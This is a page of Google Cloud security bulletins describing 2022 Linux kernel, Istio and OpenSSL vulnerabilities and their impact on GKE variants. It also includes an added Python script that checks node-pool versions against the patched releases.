Two new vulnerabilities (CVE-2022-3786 and CVE-2022-3602) have been discovered in OpenSSL 3.0 (versions 3.0.0 through 3.0.6) that can potentially cause a crash.
What should I do? No action required. GKE on Azure is not affected by these CVEs, as it does not use an impacted version of OpenSSL. |
None |
GKE on Bare Metal
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2022-3786 and CVE-2022-3602) have been discovered in OpenSSL 3.0 (versions 3.0.0 through 3.0.6) that can potentially cause a crash.
What should I do? No action required. GKE on Bare Metal is not affected by these CVEs, as it does not use an impacted version of OpenSSL. |
None |
GCP-2022-025
Published: 2022-12-21
Updated: 2023-01-19, 2023-12-21
Reference: CVE-2022-2602
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted.
2023-01-19 Update: GKE version 1.21.14-gke.14100 is available.
GKE
Updated: 2023-01-19
Description | Severity |
---|---|
2023-12-21 Update: The original bulletin stated Autopilot clusters are impacted, but this was incorrect. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Unconfined profile or allow
A new vulnerability (CVE-2022-2602) has been discovered in the io_uring subsystem in the Linux kernel that can allow an attacker to potentially execute arbitrary code. GKE clusters, including Autopilot clusters, are impacted. GKE clusters using GKE Sandbox are not affected.
What should I do? 2023-01-19 Update: Version 1.21.14-gke.14100 is available. Upgrade your node pools to this version or later. The following versions of GKE have been updated with code to fix this vulnerability in an upcoming release. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your node pools to one of the following GKE versions:
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your release-specific channel.
What vulnerabilities are addressed by this patch? With CVE-2022-2602, a race condition between io_uring request processing and Unix socket garbage collection can cause a use-after-free vulnerability. A local attacker could use this to trigger a denial of service or possibly execute arbitrary code. |
High |
GKE on VMware
Description | Severity |
---|---|
A new vulnerability (CVE-2022-2602) has been discovered in the io_uring subsystem in the Linux kernel that can allow an attacker to potentially execute arbitrary code. Versions 1.11, 1.12 and 1.13 of GKE on VMware are affected.
What should I do? Upgrade your cluster to a patched version. The following versions of GKE on VMware contain code that fixes this vulnerability:
What vulnerabilities are addressed by this patch? With CVE-2022-2602, a race condition between io_uring request processing and Unix socket garbage collection can cause a use-after-free vulnerability. A local attacker could use this to trigger a denial of service or possibly execute arbitrary code. |
High |
GKE on AWS
Description | Severity |
---|---|
A new vulnerability (CVE-2022-2602) has been discovered in the io_uring subsystem in the Linux kernel that can allow an attacker to potentially execute arbitrary code.
What should I do? The following current and previous generation versions of GKE on AWS have been updated with code to fix this vulnerability. We recommend that you upgrade your nodes to one of the following GKE on AWS versions:
What vulnerabilities are addressed by this patch? With CVE-2022-2602, a race condition between io_uring request processing and Unix socket garbage collection can cause a use-after-free vulnerability. A local attacker could use this to trigger a denial of service or possibly execute arbitrary code. |
High |
GKE on Azure
Description | Severity |
---|---|
A new vulnerability (CVE-2022-2602) has been discovered in the io_uring subsystem in the Linux kernel that can allow an attacker to potentially execute arbitrary code.
What should I do? The following versions of GKE on Azure have been updated with code to fix this vulnerability. We recommend that you upgrade your nodes to one of the following GKE on Azure versions:
What vulnerabilities are addressed by this patch? With CVE-2022-2602, a race condition between io_uring request processing and Unix socket garbage collection can cause a use-after-free vulnerability. A local attacker could use this to trigger a denial of service or possibly execute arbitrary code. |
High |
GKE on Bare Metal
Description | Severity |
---|---|
A new vulnerability (CVE-2022-2602) has been discovered in the io_uring subsystem in the Linux kernel that can allow an attacker to potentially execute arbitrary code. GKE on Bare Metal is not affected by this CVE, as it does not bundle an operating system in its distribution.
What should I do? No action required. |
None |
GCP-2022-024
Published: 2022-11-09
Updated: 2023-01-19
Reference: CVE-2022-2585, CVE-2022-2588
2023-01-19 Update: GKE version 1.21.14-gke.14100 is available.
2022-12-16 Update: Added revised patch versions for GKE and GKE on VMware.
GKE
Updated: 2023-01-19
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2022-2585 and CVE-2022-2588) have been discovered in the Linux kernel that can lead to a full container breakout to root on the node. GKE clusters, including Autopilot clusters, are impacted. GKE clusters using GKE Sandbox are not affected.
What should I do? 2023-01-19 Update: Version 1.21.14-gke.14100 is available. Upgrade your node pools to this version or later. 2022-12-16 Update: A previous version of the bulletin has been revised due to a release regression. Please manually upgrade your node pools to one of the following GKE versions:
The following versions of GKE have been updated with code to fix these vulnerabilities. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your node pools to one of the following GKE versions:
Updates for GKE v1.22, 1.23 and 1.25 will be made available soon. This security bulletin will be updated when they become available. A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your release-specific channel.
What vulnerabilities are addressed by this patch? With CVE-2022-2585, improper cleanup of timers in the POSIX CPU timer allows a use-after-free exploit depending on how timers are created and deleted. With CVE-2022-2588, a use-after-free flaw was found in route4_change in the Linux kernel. This flaw allows a local user to crash the system and possibly lead to a local privilege escalation. |
High |
GKE on VMware
Updated: 2022-12-16
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2022-2585 and CVE-2022-2588) have been discovered in the Linux kernel that can lead to a full container breakout to root on the node. Versions 1.13, 1.12 and 1.11 of GKE on VMware are affected.
What should I do? 2022-12-16 Update: The following versions of GKE on VMware have been updated with code to fix these vulnerabilities. We recommend that you upgrade your admin and user clusters to one of the following GKE on VMware versions:
What vulnerabilities are addressed by this patch? With CVE-2022-2585, improper cleanup of timers in the POSIX CPU timer allows a use-after-free exploit depending on how timers are created and deleted. With CVE-2022-2588, a use-after-free flaw was found in route4_change in the Linux kernel. This flaw allows a local user to crash the system and possibly lead to a local privilege escalation. |
High |
GKE on AWS
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2022-2585 and CVE-2022-2588) have been discovered in the Linux kernel that can lead to a full container breakout to root on the node. The following versions of Kubernetes on AWS may be affected:
Kubernetes v1.24 is not affected.
What should I do? We recommend that you upgrade your clusters to one of the following AWS Kubernetes versions:
What vulnerabilities are being addressed? With CVE-2022-2585, improper cleanup of timers in the POSIX CPU timer allows a use-after-free exploit depending on how timers are created and deleted. With CVE-2022-2588, a use-after-free flaw was found in route4_change in the Linux kernel. This flaw allows a local user to crash the system and possibly lead to a local privilege escalation. |
High |
GKE on Azure
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2022-2585 and CVE-2022-2588) have been discovered in the Linux kernel that can lead to a full container breakout to root on the node. The following versions of Kubernetes on Azure may be affected:
Kubernetes v1.24 is not affected.
What should I do? We recommend that you upgrade your clusters to one of the following Azure Kubernetes versions:
What vulnerabilities are being addressed? With CVE-2022-2585, improper cleanup of timers in the POSIX CPU timer allows a use-after-free exploit depending on how timers are created and deleted. With CVE-2022-2588, a use-after-free flaw was found in route4_change in the Linux kernel. This flaw allows a local user to crash the system and possibly lead to a local privilege escalation. |
High |
GKE on Bare Metal
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2022-2585 and CVE-2022-2588) have been discovered in the Linux kernel that can lead to a full container breakout to root on the node. GKE on Bare Metal is not affected by these CVEs, as it does not bundle an operating system in its distribution.
What should I do? No action required. |
None |
GCP-2022-023
Published: 2022-11-04
Reference: CVE-2022-39278
GKE
Description | Severity |
---|---|
A security vulnerability, CVE-2022-39278, has been discovered in Istio, which is used in Cloud Service Mesh, that allows a malicious attacker to crash the control plane.
What should I do? Google Kubernetes Engine (GKE) doesn't ship with Istio and isn't affected by this vulnerability. However, if you have separately installed Cloud Service Mesh or Istio on your GKE cluster, refer to GCP-2022-020, the Cloud Service Mesh security bulletin on this CVE, for more information. |
None |
GKE on VMware
Description | Severity |
---|---|
A security vulnerability, CVE-2022-39278, has been discovered in Istio, which is used in Cloud Service Mesh in GKE on VMware, that allows a malicious attacker to crash the Istio control plane.
What should I do? The following versions of GKE on VMware have been updated with code to fix this vulnerability. We recommend that you upgrade your admin and user clusters to one of the following GKE on VMware versions:
What vulnerabilities are addressed by this patch? With vulnerability CVE-2022-39278, the Istio control plane, |
High |
GKE on AWS
Description | Severity |
---|---|
A security vulnerability, CVE-2022-39278, has been discovered in Istio, which is used in Cloud Service Mesh, that allows a malicious attacker to crash the control plane.
What should I do? GKE on AWS isn't affected by this vulnerability and no action is required. |
None |
GKE on Azure
Description | Severity |
---|---|
A security vulnerability, CVE-2022-39278, has been discovered in Istio, which is used in Cloud Service Mesh, that allows a malicious attacker to crash the control plane.
What should I do? GKE on Azure isn't affected by this vulnerability and no action is required. |
None |
GKE on Bare Metal
Description | Severity |
---|---|
A security vulnerability, CVE-2022-39278, has been discovered in Istio, which is used in Cloud Service Mesh in GKE on Bare Metal, that allows a malicious attacker to crash the Istio control plane.
What should I do? The following versions of GKE on Bare Metal have been updated with code to fix this vulnerability. We recommend that you upgrade clusters to one of the following GKE on Bare Metal versions:
What vulnerabilities are addressed by this patch? With vulnerability CVE-2022-39278, the Istio control plane, |
High |
GCP-2022-022-updated
Published: 2022-12-08
Reference: CVE-2022-20409
GKE
Updated: 2022-12-14
Description | Severity |
---|---|
A new vulnerability, CVE-2022-20409, has been discovered in the Linux kernel that can lead to local privilege escalation. Google Kubernetes Engine (GKE) v1.22, v1.23, and v1.24 clusters, including Autopilot clusters, using Container-Optimized OS versions 93 and 97 are impacted. Other supported GKE versions aren't affected. GKE clusters using GKE Sandbox are unaffected.
What should I do? 2022-12-14 Update: A previous version of the bulletin has been revised due to a release regression. Please manually upgrade your node pools to one of the following GKE versions:
The following versions of GKE using Container-Optimized OS versions 93 and 97 have been updated with code to fix this vulnerability in an upcoming release. For security purposes, even if you have node auto-upgrades enabled, we recommend that you manually upgrade your node pools to one of the following GKE versions:
A recent feature of release channels lets you apply a patch without having to unsubscribe from a channel. This feature lets you secure your nodes until the new version becomes the default for your release-specific channel.
What vulnerabilities are addressed by this patch? With CVE-2022-20409, the Linux kernel has a vulnerability in io_identity_cow of the io_uring subsystem. There's a potential for memory corruption due to a use-after-free (UAF) vulnerability. A local attacker could use this memory corruption for denial of service (system crash) or possibly to execute arbitrary code. |
High |
GKE on VMware
Updated: 2022-12-14
Description | Severity |
---|---|
A new vulnerability, CVE-2022-20409, has been discovered in the Linux kernel that can lead to local privilege escalation.
What should I do? 2022-12-14 Update: The following versions of GKE on VMware for Ubuntu have been updated with code to fix this vulnerability. We recommend that you upgrade your nodes to one of the following GKE on VMware versions:
What vulnerabilities are addressed by this patch? With CVE-2022-20409, the Linux kernel has a vulnerability in io_identity_cow of the io_uring subsystem. There's a potential for memory corruption due to a use-after-free (UAF) vulnerability. A local attacker could use this memory corruption for denial of service (system crash) or possibly to execute arbitrary code. |
High |
GKE on AWS
Description | Severity |
---|---|
A new vulnerability, CVE-2022-20409, has been discovered in the Linux kernel that could allow an unprivileged user to escalate to system execution privilege.
What should I do? There's no action required. GKE on AWS doesn't use the affected versions of the Linux kernel.
What vulnerabilities are addressed by this patch? With CVE-2022-20409, the Linux kernel has a vulnerability in io_identity_cow of the io_uring subsystem. There's a potential for memory corruption due to a use-after-free (UAF) vulnerability. A local attacker could use this memory corruption for denial of service (system crash) or possibly to execute arbitrary code. |
None |
GKE on Azure
Description | Severity |
---|---|
A new vulnerability, CVE-2022-20409, has been discovered in the Linux kernel that could allow an unprivileged user to escalate to system execution privilege.
What should I do? There's no action required. GKE on Azure doesn't use the affected versions of the Linux kernel.
What vulnerabilities are addressed by this patch? With CVE-2022-20409, the Linux kernel has a vulnerability in io_identity_cow of the io_uring subsystem. There's a potential for memory corruption due to a use-after-free (UAF) vulnerability. A local attacker could use this memory corruption for denial of service (system crash) or possibly to execute arbitrary code. |
None |
GKE on Bare Metal
Description | Severity |
---|---|
A new vulnerability, CVE-2022-20409, has been discovered in the Linux kernel that can lead to local privilege escalation. What should I do?
|
None |
GCP-2022-021
Published: 2022-10-27
Updated: 2023-01-19, 2023-12-21
Reference: CVE-2022-3176
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted.
2023-01-19 Update: GKE version 1.21.14-gke.14100 is available.
2022-12-15 Update: Updated information that version 1.21.14-gke.9400 of Google Kubernetes Engine is pending rollout and may be superseded by a higher version number.
2022-11-21 Update: Added patch versions for GKE on VMware, GKE on AWS, and GKE on Azure.
GKE
Updated: 2023-01-19, 2023-12-21
Description | Severity |
---|---|
A new vulnerability, CVE-2022-3176, has been discovered in the Linux kernel that can lead to local privilege escalation. This vulnerability allows an unprivileged user to achieve full container breakout to root on the node.
2023-12-21 Update: The original bulletin stated Autopilot clusters are impacted, but this was incorrect. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Unconfined profile or allow
Google Kubernetes Engine (GKE) v1.21 clusters, including Autopilot clusters, using Container-Optimized OS version 89 are impacted. Later versions of GKE aren't affected. All Linux clusters with Ubuntu are affected. GKE clusters using GKE Sandbox are unaffected.
What should I do? 2023-01-19 Update: Version 1.21.14-gke.14100 is available. Upgrade your node pools to this version or later. 2022-12-15 Update: Version 1.21.14-gke.9400 is pending rollout and may be superseded by a higher version number. We will update this bulletin when the new version is available. The following versions of GKE have been updated with code to fix this vulnerability in an upcoming release. For security purposes, even if you have node auto-upgrades enabled, we recommend that you manually upgrade your node pools to one of the following GKE versions:
A recent feature of release channels lets you apply a patch without having to unsubscribe from a channel. This feature lets you secure your nodes until the new version becomes the default for your release-specific channel.
What vulnerabilities are addressed by this patch? With CVE-2022-3176, the Linux kernel has a vulnerability in the io_uring subsystem. Missing POLLFREE handling can lead to use-after-free (UAF) exploits that can be used for privilege escalation. |
High |
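The "What should I do?" sections of GCP-2022-021, GCP-2022-024 and GCP-2022-025 above all come down to the same instruction: get every node pool on a fixed version (1.21.14-gke.14100 or later for 1.21). Checking a fleet by eye is error-prone, and comparing GKE version strings as text gets it wrong, because the build number after `-gke.` is numeric (as text, 9400 sorts after 14100). The script below is an added example, not Google's code. It parses the JSON that `gcloud container node-pools list --format=json` prints (assumed to carry `name` and `version` fields), orders versions numerically and reports each pool that is below the fixed version for its minor release, or whose minor has no fixed version listed. The only fixed version taken from this page is 1.21.14-gke.14100; the node-pool records are constructed for illustration.

```python
"""Check GKE node pool versions against a bulletin's fixed versions.

Added example for this page (not Google's code). Assumes the JSON from
`gcloud container node-pools list --format=json`, where each node pool
carries a "version" such as "1.21.14-gke.14100".
"""
import json
import re
import sys
from typing import Optional

# GKE versions look like MAJOR.MINOR.PATCH-gke.BUILD; every field is numeric.
_GKE_VERSION = re.compile(r"^(\d+)\.(\d+)\.(\d+)-gke\.(\d+)$")


def parse_gke_version(version: str) -> tuple:
    """Turn '1.21.14-gke.14100' into (1, 21, 14, 14100) so tuples order correctly."""
    match = _GKE_VERSION.match(version.strip())
    if not match:
        raise ValueError(f"not a GKE version string: {version!r}")
    return tuple(int(part) for part in match.groups())


def minor_key(version: str) -> str:
    """'1.21.14-gke.14100' -> '1.21', the key bulletins list fixed versions by."""
    major, minor, _patch, _build = parse_gke_version(version)
    return f"{major}.{minor}"


def is_patched(version: str, fixed_versions: dict) -> Optional[bool]:
    """True if version is at or above the fixed version for its minor.

    Returns None when the bulletin lists no fixed version for that minor, so the
    caller can surface it for a manual check instead of assuming it is safe.
    """
    fixed = fixed_versions.get(minor_key(version))
    if fixed is None:
        return None
    return parse_gke_version(version) >= parse_gke_version(fixed)


def unpatched_node_pools(node_pools_json: str, fixed_versions: dict) -> list:
    """Return the node pools that are below their minor's fixed version or unknown."""
    findings = []
    for pool in json.loads(node_pools_json):
        version = pool["version"]
        status = is_patched(version, fixed_versions)
        if status is True:
            continue
        findings.append({
            "name": pool["name"],
            "version": version,
            "fixed": fixed_versions.get(minor_key(version)),
            "status": "unpatched" if status is False else "no fixed version listed",
        })
    return findings


# The one fixed version stated in the bulletins on this page (1.21 line).
# Add the fixed version for every other minor from the bulletin's own list.
FIXED_VERSIONS = {"1.21": "1.21.14-gke.14100"}

# Constructed sample in the shape of `gcloud container node-pools list --format=json`.
# The superseded 1.21.14-gke.9400 is named on the page; the 1.22 version is made up.
SAMPLE_NODE_POOLS = json.dumps([
    {"name": "default-pool", "version": "1.21.14-gke.9400"},
    {"name": "batch-pool", "version": "1.21.14-gke.14100"},
    {"name": "gpu-pool", "version": "1.22.15-gke.1000"},
])

if __name__ == "__main__":
    # Pipe real gcloud output in, or run with no input to see the sample.
    data = SAMPLE_NODE_POOLS if sys.stdin.isatty() else sys.stdin.read()
    for finding in unpatched_node_pools(data, FIXED_VERSIONS):
        print(f"{finding['name']}: {finding['version']} -> {finding['status']}"
              f" (fixed: {finding['fixed']})")
```

Run it as `gcloud container node-pools list --cluster CLUSTER --location LOCATION --format=json | python3 check_versions.py` (file name assumed) after filling FIXED_VERSIONS from the bulletin. A pool whose minor is not in the map is reported rather than skipped; that is deliberate, since the lists above were updated several times and a missing entry usually means the bulletin changed after the map was written.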
GKE on VMware
Updated: 2022-11-21
Description | Severity |
---|---|
A new vulnerability, CVE-2022-3176, has been discovered in the Linux kernel that can lead to local privilege escalation. This vulnerability allows an unprivileged user to achieve full container breakout to root on the node.
What should I do? 2022-11-21 Update: The following versions of GKE on VMware for Ubuntu have been updated with code to fix this vulnerability. We recommend that you upgrade your nodes to one of the following GKE on VMware versions:
Versions of GKE on VMware that contain Ubuntu patches will be released soon. This security bulletin will be updated when the GKE on VMware versions are available for download.
What vulnerabilities are addressed by this patch? With CVE-2022-3176, the Linux kernel has a vulnerability in the io_uring subsystem. Missing POLLFREE handling can lead to use-after-free (UAF) exploits that can be used for privilege escalation. |
High |
GKE on AWS
Updated: 2022-11-21
Description | Severity |
---|---|
A new vulnerability, CVE-2022-3176, has been discovered in the Linux kernel that can lead to local privilege escalation. This vulnerability allows an unprivileged user to achieve full container breakout to root on the node.
What should I do? 2022-11-21 Update: The following current and previous generation versions of GKE on AWS have been updated with code to fix this vulnerability. We recommend that you upgrade your nodes to one of the following GKE on AWS versions:
Current generation
Versions of GKE on AWS that contain Ubuntu patches will be released soon. This security bulletin will be updated when the GKE on AWS versions are available for download.
What vulnerabilities are addressed by this patch? With CVE-2022-3176, the Linux kernel has a vulnerability in the io_uring subsystem. Missing POLLFREE handling can lead to use-after-free (UAF) exploits that can be used for privilege escalation. |
High |
GKE on Azure
Updated: 2022-11-21
Description | Severity |
---|---|
A new vulnerability, CVE-2022-3176, has been discovered in the Linux kernel that can lead to local privilege escalation. This vulnerability allows an unprivileged user to achieve full container breakout to root on the node.
What should I do? 2022-11-21 Update: The following versions of GKE on Azure have been updated with code to fix this vulnerability. We recommend that you upgrade your nodes to one of the following GKE on Azure versions:
Versions of GKE on Azure that contain Ubuntu patches will be released soon. This security bulletin will be updated when the GKE on Azure versions are available for download.
What vulnerabilities are addressed by this patch? With CVE-2022-3176, the Linux kernel has a vulnerability in the io_uring subsystem. Missing POLLFREE handling can lead to use-after-free (UAF) exploits that can be used for privilege escalation. |
High |
GKE on Bare Metal
Description | Severity |
---|---|
A new vulnerability, CVE-2022-3176, has been discovered in the Linux kernel that can lead to local privilege escalation. This vulnerability allows an unprivileged user to achieve full container breakout to root on the node.
What should I do? No action required. GKE on Bare Metal isn't affected by this CVE, as it doesn't bundle an operating system in its distribution. |
None |
GCP-2022-018
Published: 2022-08-01
Updated: 2022-09-14, 2023-12-21
Reference: CVE-2022-2327
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted.
2022-09-14 Update: Added patch versions for GKE on VMware, GKE on AWS, and GKE on Azure.
GKE
Updated: 2023-12-21
Description | Severity |
---|---|
A new vulnerability (CVE-2022-2327) has been discovered in the Linux kernel that can lead to local privilege escalation. This vulnerability allows an unprivileged user to achieve a full container breakout to root on the node. Technical details: 2023-12-21 Update: The original bulletin stated that Autopilot clusters are impacted, but this was incorrect. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Unconfined profile or allow
GKE clusters, including Autopilot clusters, with Container-Optimized OS (COS) using Linux kernel version 5.10 are affected. GKE clusters using Ubuntu images or using GKE Sandbox are unaffected. What should I do? Upgrade your GKE clusters to a version that includes the fix.
The Linux node images for COS have been updated along with the GKE versions that use those COS versions. A recent release channels feature allows you to apply a patch without unsubscribing from a channel. This lets you upgrade your nodes to the patched version before that version becomes the default in your selected release channel. What vulnerabilities are addressed by this patch? With CVE-2022-2327, the Linux kernel in version 5.10 has a vulnerability in the io_uring subsystem where various requests are missing item types (flags). Using these requests without the proper item types specified can cause privilege escalation to root. |
High |
GKE on VMware
Updated: 2022-09-14
Description | Severity |
---|---|
A new vulnerability (CVE-2022-2327) has been discovered in the Linux kernel that can lead to local privilege escalation. This vulnerability allows an unprivileged user to achieve a full container breakout to root on the node. Clusters with a Container-Optimized OS (COS) image using GKE on VMware versions 1.10, 1.11, and 1.12 are affected. What should I do? 2022-09-14 Update: The following versions of GKE on VMware contain code that fixes this vulnerability.
Versions of GKE on VMware that contain patches will be released soon. This security bulletin will be updated when the GKE on VMware versions are available for download. What vulnerabilities are addressed by this patch? With CVE-2022-2327, the Linux kernel in version 5.10 has a vulnerability in the io_uring subsystem where various requests are missing item types (flags). Using these requests without the proper item types specified can cause privilege escalation to root. |
High |
GKE on AWS
Updated: 2022-09-14
Description | Severity |
---|---|
A new vulnerability (CVE-2022-2327) has been discovered in the Linux kernel that can lead to local privilege escalation. This vulnerability allows an unprivileged user to achieve a full container breakout to root on the node. What should I do? 2022-09-14 Update: The following current and previous generation versions of GKE on AWS have been updated with code to fix this vulnerability. We recommend that you upgrade your nodes to one of the following GKE on AWS versions: Current generation
Previous generation
Versions of GKE on AWS that contain patches will be released soon. This security bulletin will be updated when the GKE on AWS versions are available for download. What vulnerabilities are addressed by this patch? With CVE-2022-2327, the Linux kernel in version 5.10 has a vulnerability in the io_uring subsystem where various requests are missing item types (flags). Using these requests without the proper item types specified can cause privilege escalation to root. |
High |
GKE on Azure
Updated: 2022-09-14
Description | Severity |
---|---|
A new vulnerability (CVE-2022-2327) has been discovered in the Linux kernel that can lead to local privilege escalation. This vulnerability allows an unprivileged user to achieve a full container breakout to root on the node. What should I do? 2022-09-14 Update: The following versions of GKE on Azure have been updated with code to fix this vulnerability. We recommend that you upgrade your nodes to one of the following GKE on Azure versions:
Versions of GKE on Azure that contain patches will be released soon. This security bulletin will be updated when the GKE on Azure versions are available for download. What vulnerabilities are addressed by this patch? With CVE-2022-2327, the Linux kernel in version 5.10 has a vulnerability in the io_uring subsystem where various requests are missing item types (flags). Using these requests without the proper item types specified can cause privilege escalation to root. |
High |
Google Distributed Cloud Virtual for Bare Metal
Description | Severity |
---|---|
A new vulnerability (CVE-2022-2327) has been discovered in the Linux kernel that can lead to local privilege escalation. This vulnerability allows an unprivileged user to achieve a full container breakout to root on the node. What should I do? There is no action required. Google Distributed Cloud Virtual for Bare Metal is not affected by this CVE because it does not bundle an operating system in its distribution. |
None |
GCP-2022-017
Published: 2022-06-29
Updated: 2022-11-22
Reference: CVE-2022-1786
2022-11-22 Update: Updated information about workloads using GKE Sandbox.
2022-07-21 Update: Updated information that GKE on VMware COS images
are affected.
GKE
Updated: 2022-11-22
Description | Severity |
---|---|
2022-11-22 update: Workloads using GKE Sandbox are not affected by this vulnerability. A new vulnerability (CVE-2022-1786) has been discovered in Linux kernel versions 5.10 and 5.11. This vulnerability allows an unprivileged user with local access to the cluster to achieve a full container breakout to root on the node. Only clusters that run Container-Optimized OS are affected. GKE Ubuntu node images use either version 5.4 or 5.15 of the kernel and are not affected. What should I do? The Container-Optimized OS node images in the following GKE versions have been updated with code to fix this vulnerability. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your node pools to one of the following upcoming GKE versions:
A recent release channels feature allows you to apply a patch without unsubscribing from a channel. This lets you upgrade your nodes to the patched version before that version becomes the default in your selected release channel. What vulnerabilities are addressed by this patch? With CVE-2022-1786, a use-after-free flaw was found in the Linux kernel's io_uring subsystem. If a user sets up a ring with IORING_SETUP_IOPOLL and more than one task completes submissions on the ring, a local user can crash the system or escalate their privileges. |
High |
GKE on VMware
Updated: 2022-07-14
Description | Severity |
---|---|
A new vulnerability (CVE-2022-1786) has been discovered in Linux kernel versions 5.10 and 5.11. This vulnerability allows an unprivileged user with local access to the cluster to achieve a full container breakout to root on the node. What should I do? 2022-07-21 Update: The following versions of GKE on VMware contain code that fixes this vulnerability. COS
Ubuntu: There is no action required. GKE on VMware Ubuntu images do not use the affected versions of the Linux kernel. |
None |
GKE on AWS
Description | Severity |
---|---|
A new vulnerability (CVE-2022-1786) has been discovered in Linux kernel versions 5.10 and 5.11. This vulnerability allows an unprivileged user with local access to the cluster to achieve a full container breakout to root on the node. What should I do? There is no action required. GKE on AWS does not use the affected versions of the Linux kernel. |
None |
GKE on Azure
Description | Severity |
---|---|
A new vulnerability (CVE-2022-1786) has been discovered in Linux kernel versions 5.10 and 5.11. This vulnerability allows an unprivileged user with local access to the cluster to achieve a full container breakout to root on the node. What should I do? There is no action required. GKE on Azure does not use the affected versions of the Linux kernel. |
None |
Google Distributed Cloud Virtual for Bare Metal
Description | Severity |
---|---|
A new vulnerability (CVE-2022-1786) has been discovered in Linux kernel versions 5.10 and 5.11. This vulnerability allows an unprivileged user with local access to the cluster to achieve a full container breakout to root on the node. What should I do? There is no action required. Google Distributed Cloud Virtual for Bare Metal is not affected by this CVE because it does not bundle an operating system in its distribution. |
None |
GCP-2022-016
Published: 2022-06-23
Updated: 2022-11-22
Reference: CVE-2022-29581, CVE-2022-29582, CVE-2022-1116
2022-11-22 Update: Added information about workloads running in Autopilot clusters.
2022-07-29 Update: Updated versions for GKE on VMware,
GKE on AWS, and GKE on Azure.
GKE
Updated: 2022-11-22
Description | Severity |
---|---|
2022-11-22 update: Autopilot clusters are not affected by CVE-2022-29581 but are vulnerable to CVE-2022-29582 and CVE-2022-1116. 2022-07-29 update: Pods using GKE Sandbox are not vulnerable to these vulnerabilities. Three new memory corruption vulnerabilities (CVE-2022-29581, CVE-2022-29582, CVE-2022-1116) have been discovered in the Linux kernel. These vulnerabilities allow an unprivileged user with local access to the cluster to achieve a full container breakout to root on the node. All Linux clusters (Container-Optimized OS and Ubuntu) are affected. What should I do? The Container-Optimized OS and Ubuntu node images in the following GKE versions have been updated with code to fix these vulnerabilities. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your node pools to one of the following GKE versions:
A recent release channels feature allows you to apply a patch without unsubscribing from a channel. This lets you upgrade your nodes to the patched version before that version becomes the default in your selected release channel. What vulnerabilities are addressed by this patch? With CVE-2022-29582, the Linux kernel in versions prior to 5.17.3 has a use-after-free due to a race condition in io_uring timeouts. CVE-2022-29581 and CVE-2022-1116 are vulnerabilities where a local attacker can cause memory corruption in net/sched or io_uring in the Linux kernel to escalate privileges to root. |
High |
GKE on VMware
Updated: 2022-07-29
Description | Severity |
---|---|
2022-07-29 Update: The following versions of GKE on VMware contain code that fixes these vulnerabilities.
Three new memory corruption vulnerabilities (CVE-2022-29581, CVE-2022-29582, CVE-2022-1116) have been discovered in the Linux kernel. These vulnerabilities allow an unprivileged user with local access to the cluster to achieve a full container breakout to root on the node. These vulnerabilities affect GKE on VMware v1.9 and later for Container-Optimized OS and Ubuntu images. What should I do? Versions of GKE on VMware that contain patches will be released soon. This security bulletin will be updated when the GKE on VMware versions are available for download. What vulnerabilities are addressed by this patch? With CVE-2022-29582, the Linux kernel in versions prior to 5.17.3 has a use-after-free due to a race condition in io_uring timeouts. CVE-2022-29581 and CVE-2022-1116 are vulnerabilities where a local attacker can cause memory corruption in net/sched or io_uring in the Linux kernel to escalate privileges to root. |
High |
GKE on AWS
Updated: 2022-07-29
Description | Severity |
---|---|
2022-07-29 Update: The following current and previous generation versions of GKE on AWS have been updated with code to fix these vulnerabilities. We recommend that you upgrade your nodes to one of the following GKE on AWS versions: Current generation:
Three new memory corruption vulnerabilities (CVE-2022-29581, CVE-2022-29582, CVE-2022-1116) have been discovered in the Linux kernel. These vulnerabilities allow an unprivileged user with local access to the cluster to achieve a full container breakout to root on the node. These vulnerabilities affect all versions of GKE on AWS. What should I do? Versions of GKE on AWS that contain patches will be released soon. This security bulletin will be updated when the GKE on AWS versions are available for download. What vulnerabilities are addressed by this patch? With CVE-2022-29582, the Linux kernel in versions prior to 5.17.3 has a use-after-free due to a race condition in io_uring timeouts. CVE-2022-29581 and CVE-2022-1116 are vulnerabilities where a local attacker can cause memory corruption in net/sched or io_uring in the Linux kernel to escalate privileges to root. |
High |
GKE on Azure
Description | Severity |
---|---|
2022-07-29 Update: The following versions of GKE on Azure have been updated with code to fix these vulnerabilities. We recommend that you upgrade your nodes to one of the following GKE on Azure versions:
Three new memory corruption vulnerabilities (CVE-2022-29581, CVE-2022-29582, CVE-2022-1116) have been discovered in the Linux kernel. These vulnerabilities allow an unprivileged user with local access to the cluster to achieve a full container breakout to root on the node. These vulnerabilities affect all versions of GKE on Azure. What should I do? Versions of GKE on Azure that contain patches will be released soon. This security bulletin will be updated when the GKE on Azure versions are available for download. What vulnerabilities are addressed by this patch? With CVE-2022-29582, the Linux kernel in versions prior to 5.17.3 has a use-after-free due to a race condition in io_uring timeouts. CVE-2022-29581 and CVE-2022-1116 are vulnerabilities where a local attacker can cause memory corruption in net/sched or io_uring in the Linux kernel to escalate privileges to root. |
High |
Google Distributed Cloud Virtual for Bare Metal
Description | Severity |
---|---|
Three new memory corruption vulnerabilities (CVE-2022-29581, CVE-2022-29582, CVE-2022-1116) have been discovered in the Linux kernel. These vulnerabilities allow an unprivileged user with local access to the cluster to achieve a full container breakout to root on the node. What should I do? There is no action required. Google Distributed Cloud Virtual for Bare Metal is not affected by these vulnerabilities because it does not bundle an operating system in its distribution. |
None |
GCP-2022-014
Published: 2022-04-26
Updated: 2022-11-22
2022-11-22 Update: Added information about workloads running in Autopilot clusters.
